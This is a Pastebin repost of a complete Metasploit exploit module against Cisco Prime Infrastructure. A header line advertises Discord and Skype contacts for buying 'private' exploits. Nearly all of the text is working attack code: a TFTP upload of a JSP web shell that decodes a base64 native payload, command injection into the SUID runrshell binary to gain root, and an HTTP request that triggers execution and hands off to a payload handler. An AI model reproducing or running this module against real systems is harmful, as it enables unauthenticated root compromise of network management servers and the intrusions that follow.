SHARE
TWEET

[CISCO PRIME INFRASTRUCTURE LOADER] RCE METASPLOIT

xB4ckdoorREAL Nov 7th, 2018 101 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ## DISCORD:  https://discord.gg/QDy3bUy OR SKYPE: b4ckdoor.porn ( for spot/private source or exploit)
  2. # This module requires Metasploit: http://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5.  
  6. class MetasploitModule < Msf::Exploit::Remote
  7.   Rank = ExcellentRanking
  8.  
  9.   include Msf::Exploit::Remote::HttpClient
  10.   include Msf::Exploit::EXE
  11.   include Msf::Exploit::FileDropper
  12.  
  13.   def initialize(info = {})
  14.     super(update_info(info,
  15.       'Name'           => 'Cisco Prime Infrastructure Unauthenticated Remote Code Execution',
  16.       'Description'    => %q{
  17.         Cisco Prime Infrastructure (CPI) contains two basic flaws that when exploited allow
  18.         an unauthenticated attacker to achieve remote code execution. The first flaw is a file
  19.         upload vulnerability that allows the attacker to upload and execute files as the Apache
  20.         Tomcat user; the second is a privilege escalation to root by bypassing execution restrictions
  21.         in a SUID binary.
  22.  
  23.         This module exploits these vulnerabilities to achieve unauthenticated remote code execution
  24.         as root on the CPI default installation.
  25.  
  26.         This module has been tested with CPI 3.2.0.0.258 and 3.4.0.0.348. Earlier and later versions
  27.         might also be affected, although 3.4.0.0.348 is the latest at the time of writing.
  28.       },
  29.       'Author'         =>
  30.         [
  31.           'Pedro Ribeiro'        # Vulnerability discovery and Metasploit module
  32.         ],
  33.       'License'        => MSF_LICENSE,
  34.       'References'     =>
  35.         [
  36.           [ 'CVE', 'TODO' ],
  37.           [ 'CVE', 'TODO' ],
  38.           [ 'URL', 'TODO' ],
  39.           [ 'URL', 'TODO' ]
  40.         ],
  41.       'Platform'       => 'linux',
  42.       'Arch'           => [ARCH_X86, ARCH_X64],
  43.       'Targets'        =>
  44.         [
  45.           [ 'Cisco Prime Infrastructure', {} ]
  46.         ],
  47.       'Privileged'     => true,
  48.       'DefaultOptions' => { 'WfsDelay' => 10 },
  49.       'DefaultTarget'  => 0,
  50.       'DisclosureDate' => 'TODO'
  51.     ))
  52.  
  53.     register_options(
  54.       [
  55.         OptPort.new('RPORT', [true, 'The target port', 443]),
  56.         OptPort.new('RPORT_TFTP', [true, 'TFTPD port', 69]),
  57.         OptBool.new('SSL', [true, 'Use SSL connection', true]),
  58.         OptString.new('TARGETURI', [ true,  "swimtemp path", '/swimtemp'])
  59.       ])
  60.   end
  61.  
  62.  
  63.   def check
  64.     res = send_request_cgi({
  65.       'uri'    => normalize_uri(datastore['TARGETURI'], 'swimtemp'),
  66.       'method' => 'GET'
  67.     })
  68.     if res && res.code == 404 && res.body.length == 0
  69.       # at the moment this is the best way to detect
  70.       # a 404 in swimtemp only returns the error code with a body length of 0,
  71.       # while a 404 to another webapp or to the root returns code plus a body with content
  72.       return Exploit::CheckCode::Detected
  73.     else
  74.       return Exploit::CheckCode::Unknown
  75.     end
  76.   end
  77.  
  78.  
  79.   def upload_payload(payload)
  80.     lport = datastore['LPORT'] || (1025 + rand(0xffff-1025))
  81.     lhost = datastore['LHOST'] || "0.0.0.0"
  82.     remote_file = rand_text_alpha(rand(14) + 5) + '.jsp'
  83.  
  84.     tftp_client = Rex::Proto::TFTP::Client.new(
  85.       "LocalHost"  => lhost,
  86.       "LocalPort"  => lport,
  87.       "PeerHost"   => rhost,
  88.       "PeerPort"   => datastore['RPORT_TFTP'],
  89.       "LocalFile"  => "DATA:#{payload}",
  90.       "RemoteFile" => remote_file,
  91.       "Mode"       => 'octet',
  92.       "Context"    => {'Msf' => self.framework, 'MsfExploit' => self},
  93.       "Action"     => :upload
  94.     )
  95.     print_status "Uploading TFTP payload to #{rhost}:#{datastore['TFTP_PORT']} as '#{remote_file}'"
  96.     tftp_client.send_write_request
  97.  
  98.     remote_file
  99.   end
  100.  
  101.   def generate_jsp_payload
  102.     exe = generate_payload_exe
  103.     base64_exe = Rex::Text.encode_base64(exe)
  104.  
  105.     native_payload_name = rand_text_alpha(rand(6)+3)
  106.  
  107.     var_raw     = rand_text_alpha(rand(8) + 3)
  108.     var_ostream = rand_text_alpha(rand(8) + 3)
  109.     var_pstream = rand_text_alpha(rand(8) + 3)
  110.     var_buf     = rand_text_alpha(rand(8) + 3)
  111.     var_decoder = rand_text_alpha(rand(8) + 3)
  112.     var_tmp     = rand_text_alpha(rand(8) + 3)
  113.     var_path    = rand_text_alpha(rand(8) + 3)
  114.     var_tmp2     = rand_text_alpha(rand(8) + 3)
  115.     var_path2    = rand_text_alpha(rand(8) + 3)
  116.     var_proc2   = rand_text_alpha(rand(8) + 3)
  117.  
  118.     var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
  119.     chmod = %Q|
  120.     Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path} + " " + #{var_path2});
  121.     Thread.sleep(200);
  122.     |
  123.  
  124.     var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
  125.     cleanup = %Q|
  126.     Thread.sleep(200);
  127.     Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path} + " " + #{var_path2});
  128.     |
  129.  
  130.     jsp = %Q|
  131.     <%@page import="java.io.*"%>
  132.     <%@page import="sun.misc.BASE64Decoder"%>
  133.     <%
  134.     try {
  135.       String #{var_buf} = "#{base64_exe}";
  136.       BASE64Decoder #{var_decoder} = new BASE64Decoder();
  137.       byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
  138.  
  139.       File #{var_tmp} = File.createTempFile("#{native_payload_name}", ".bin");
  140.       String #{var_path} = #{var_tmp}.getAbsolutePath();
  141.  
  142.       BufferedOutputStream #{var_ostream} =
  143.         new BufferedOutputStream(new FileOutputStream(#{var_path}));
  144.       #{var_ostream}.write(#{var_raw});
  145.       #{var_ostream}.close();
  146.  
  147.       File #{var_tmp2} = File.createTempFile("#{native_payload_name}", ".sh");
  148.       String #{var_path2} = #{var_tmp2}.getAbsolutePath();
  149.  
  150.       PrintWriter #{var_pstream} =
  151.         new PrintWriter(new FileOutputStream(#{var_path2}));
  152.       #{var_pstream}.println("!#/bin/sh");
  153.       #{var_pstream}.println("/opt/CSCOlumos/bin/runrshell '\\" && " + #{var_path} + " #'");
  154.       #{var_pstream}.close();
  155.       #{chmod}
  156.  
  157.       Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path2});
  158.       #{cleanup}
  159.     } catch (Exception e) {
  160.     }
  161.     %>
  162.     |
  163.  
  164.     jsp = jsp.gsub(/\n/, '')
  165.     jsp = jsp.gsub(/\t/, '')
  166.     jsp = jsp.gsub(/\x0d\x0a/, "")
  167.     jsp = jsp.gsub(/\x0a/, "")
  168.  
  169.     return jsp
  170.   end
  171.  
  172.  
  173.   def exploit
  174.     jsp_payload = generate_jsp_payload
  175.  
  176.     jsp_name = upload_payload(jsp_payload)
  177.  
  178.     # we land in /opt/CSCOlumos, so we don't know the apache directory
  179.     # as it changes between versions... so leave this commented for now
  180.     # ... and try to find a good way to clean it later
  181.     # register_files_for_cleanup(jsp_name)
  182.  
  183.     print_status("#{peer} - Executing payload...")
  184.     send_request_cgi({
  185.       'uri'    => normalize_uri(datastore['TARGETURI'], jsp_name),
  186.       'method' => 'GET'
  187.     })
  188.  
  189.     handler
  190.   end
  191. end
  192. #07/11
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top